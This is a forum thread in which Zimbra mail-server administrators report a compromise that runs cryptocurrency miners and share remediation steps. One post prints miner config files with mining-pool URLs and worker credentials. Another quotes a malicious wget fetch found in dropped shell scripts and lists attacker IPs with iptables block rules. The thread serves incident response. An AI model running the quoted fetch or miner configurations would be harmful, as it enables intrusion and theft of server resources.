Results 1 to 8 of 8

Thread: cpu usage for ltsys command

  1. #1
    massspec is offline Starter Member
    Join Date
    Jan 2014
    Posts
    1
    Rep Power
    1

    Default cpu usage for ltsys command

    Has anyone ever since cpu usage for the ltsys command? top shows two PID from user zimbra at >100% cpu for the ltsys command. I can't find any reference to ltsys in the zimbra forum or from a general google search. Any help is appreciated.

  2. #2
    purepages is offline New Member
    Join Date
    Jan 2014
    Posts
    3
    Rep Power
    1

    Default

    I am seeing the exact same thing! I see the following in the /tmp folder ltsys.cfg zsys.cfg fsys.cfg

    root@zimbra:/tmp# more ltsys.cfg
    {
    "url" : "stratum+tcp://ltc.give-me-coins.com:3333",
    "user" : "doodermcpooter.boss",
    "pass" : "b0ss",
    "quiet" : true
    }
    root@zimbra:/tmp# more zsys.cfg
    {
    "url" : "stratum+tcp://ltc.give-me-coins.com:3333",
    "user" : "c0denam3_vlad.sphy",
    "pass" : "Q0qLmgY5zoi",
    "quiet" : true
    }
    root@zimbra:/tmp# more fsys.cfg
    {
    "url" : "stratum+tcp://ftc.give-me-coins.com:3336",
    "user" : "c0denam3_vlad.ftc",
    "pass" : "ftc",
    "quiet" : true
    }

    Looks like it has been hacked somehow...

  3. #3
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,585
    Rep Power
    57

    Default

    There's a total lack of information in your posts that describe the exact problem and no indication of the zZimbra version your using (you should always post the output of the command "zmcontrol -x") and no indication that you've done any reasearch on the problem. Have either of you seen these forums Announcements:

    Critical Security Vulnerability Addressed in 7.2.6/8.0.6 Maintenance Releases
    Critical Security Patches posted for 8.0.X/7.2.X
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  4. #4
    purepages is offline New Member
    Join Date
    Jan 2014
    Posts
    3
    Rep Power
    1

    Default

    Hello Bill,

    Thank you for your response. This was the only post that I came across in my 'research of the problem'. The exact problem we are having is that our CPUs are pegged at 100% with this unknown process. Today the process is:

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    30824 zimbra 20 0 199m 2932 972 S 349 0.0 1474:48 /tmp/zhelper -B -c /tmp/zhelper.cfg

    Yesterday I deleted everything from the /tmp folder and today I have the following again:

    zimbra@zimbra:/tmp$ ls
    hsperfdata_root hsperfdata_zimbra ltsys.cfg zhelper.cfg z.sh

    The contents of the files are as posted above. What I am trying to figure out is how these are being placed here and executed. Zimbra is the only thing running on this server and the process is running as the Zimbra user so I believe it is an exploit of zimbra. SSH to this server is blocked by a firewall so I am quite certain it has not been compromised in that way. The output of zmcontrol -x is as follows:

    zimbra@zimbra:/tmp$ zmcontrol -x
    Unknown option: x
    Release 8.0.6.GA.5922.UBUNTU10.64 UBUNTU10_64 NETWORK edition.

    Thanks and regards,

    Al.

  5. #5
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,585
    Rep Power
    57

    Default

    It is quite likely this hack was done before your upgrade to 8.0.6, there are also several other threads in the forums on this subject. I'd suggest you go to the support portal and take a look at some of the information that relates to this problem.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  6. #6
    BobyMike is offline New Member
    Join Date
    Jan 2014
    Posts
    3
    Rep Power
    1

    Default

    Hi Guys, Hi phoenix,

    First of all i understand that zimbra team is under havy presure regarding this, but this is no reason to be so lacking in your answers. I've been hacked too, since 4 weeks now, exactly from the same hackers mentioned bellow. I searched and found on the forum that we have to upgrade to the last version of zimbra, but there was no tutorial, no step-by-step guide how to remove the threat after we upgraded. The result??? Even if i was upgrading first to 7.2.6 and after to 8.0.6 the hackers still played with my server. I didn't see any answer from the zimbra-team telling us how did they managed to hack your systems and expose our servers! So please, be so kind and explain at least to the people (eventualy with good link or examples, not like the one you posted: "the command "zmcontrol -x" " wich is nothing! ). Not all of us are experts..if we were, then we'd work for zimbra

    So, regarding the hacking problem, i will try to explain what i did, step by step:
    1-first of all i saved all the logs for the authorities.
    2-you will have to kill all the process: for exemple: killall -9 dsys
    3-you will have to check these .cfg files to see the adresses they point to. mainly they point to give-me-coins.com subdomains. Also, you will find in your /tmp files with the extension .sh (example: z.sh, d.sh, e.sh) and if you check them inside you will see: wget -q http://abksprings.co.za; http://123.30.29.24/ .
    ltc.give-me-coins.com - 66.85.187.134
    ftc.give-me-coins.com - 66.85.142.21
    mining.eu.hypernova.pw - 176.31.160.68
    ltc-eu.give-me-coins.com:3333 - 66.85.187.133
    mega.give-me-coins.com:80 - 198.15.127.246
    btc.give-me-coins.com:3335 - 66.85.187.132
    btc-eu.give-me-coins.com:3335 - 66.85.142.20

    4 - block from your firewall (it will be best if the firewall is not the same server) these addresses:
    /usr/sbin/iptables -A FORWARD -s 66.85.142.21 -j REJECT
    /usr/sbin/iptables -A INPUT -s 66.85.142.21 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 66.85.142.21 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 162.159.247.189 -j REJECT
    /usr/sbin/iptables -A INPUT -s 162.159.247.189 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 162.159.247.189 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 66.85.187.134 -j REJECT
    /usr/sbin/iptables -A INPUT -s 66.85.187.134 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 66.85.187.134 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 176.31.160.68 -j REJECT
    /usr/sbin/iptables -A INPUT -s 176.31.160.68 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 176.31.160.68 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 66.85.187.133 -j REJECT
    /usr/sbin/iptables -A INPUT -s 66.85.187.133 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 66.85.187.133 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 198.15.127.246 -j REJECT
    /usr/sbin/iptables -A INPUT -s 198.15.127.246 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 198.15.127.246 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 66.85.187.132 -j REJECT
    /usr/sbin/iptables -A INPUT -s 66.85.187.132 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 66.85.187.132 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 66.85.142.20 -j REJECT
    /usr/sbin/iptables -A INPUT -s 66.85.142.20 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 66.85.142.20 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 205.234.130.123 -j REJECT
    /usr/sbin/iptables -A INPUT -s 205.234.130.123 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 205.234.130.123 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 123.30.29.24 -j REJECT
    /usr/sbin/iptables -A INPUT -s 123.30.29.24 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 123.30.29.24 -j REJECT

    /usr/sbin/iptables -A FORWARD -s 76.25.244.111 -j REJECT
    /usr/sbin/iptables -A INPUT -s 76.25.244.111 -j REJECT
    /usr/sbin/iptables -A OUTPUT -s 76.25.244.111 -j REJECT

    5. create an executable script and run it with cron every minute:
    killall -9 fsys
    killall -9 ltsys
    killall -9 kpoll
    killall -9 zsys
    killall -9 zhelper
    rm -rf "/tmp/dsys"
    rm -rf "/tmp/kpoll"
    rm -rf "/tmp/fsys"
    rm -rf "/tmp/ltsys"
    rm -rf "/tmp/zsys"
    rm -rf "/tmp/zhelper"
    crontab -u zimbra -r
    find /tmp -type f -name "*.sh" -exec rm -f {} \;

    6. -remove from /opt/zimbra/zimlets-deployed the following two: /com_zimbra_example_simplejspaction and /com_zimbra_example_simplejspaction2
    7. -check for any new accounts created and delete them if they seems to be suspicious.
    su zimbra
    zmaccts (it will help you to see the date they have been created)

    8. -restart your server
    9. -Change you LDAP and MYSQL passwords:
    su zimbra
    zmldappasswd -r LDAP-root-password
    zmldappasswd LDAP-zimbra-password
    zmmypasswd --root mySQL-root-password
    zmmypasswd mySQL-zimbra-password
    (or better look here: Resetting LDAP and MySQL Passwords - Zimbra :: Wiki )

    I hope this is all..at least this is what i have done till now and it seems there was no activity anymore on my server..But i am not sure.. What i've done is only to block these guys, don't know if my server is safe now. Perhaps someby from zimbra-team will advise further.

    best regards,
    BM.

  7. #7
    purepages is offline New Member
    Join Date
    Jan 2014
    Posts
    3
    Rep Power
    1

    Default

    Thank you BM for the detailed description. You are correct - this does not seem to be as clearly documented in the other threads. I have completed these steps and also see that the activity is gone away.

    Thank you to everyone for your responses here!

  8. #8
    bhelrajesh is offline Starter Member
    Join Date
    Feb 2014
    Posts
    1
    Rep Power
    1

    Default

    hi BobyMike

    The below command will solve all the above issues no need to put the above my friend
    /opt/zimbra/libexec/zmfixperms --verbose --extended
    In my case its work very well

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Memory Usage!
    By Ryan1 in forum General Questions
    Replies: 2
    Last Post: 11-22-2012, 06:27 PM
  2. Stick Usage in IE 9
    By meuchel in forum Users
    Replies: 12
    Last Post: 06-04-2012, 01:28 PM
  3. CPU usage problem
    By hanuman.mumbai1947 in forum Administrators
    Replies: 3
    Last Post: 08-20-2011, 07:28 AM
  4. Mem. usage openldap in 5.0.2 GA
    By bvan3220 in forum Administrators
    Replies: 4
    Last Post: 04-30-2008, 01:37 PM
  5. CRM Email usage please
    By dataforcecrm in forum Installation
    Replies: 1
    Last Post: 09-19-2007, 12:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •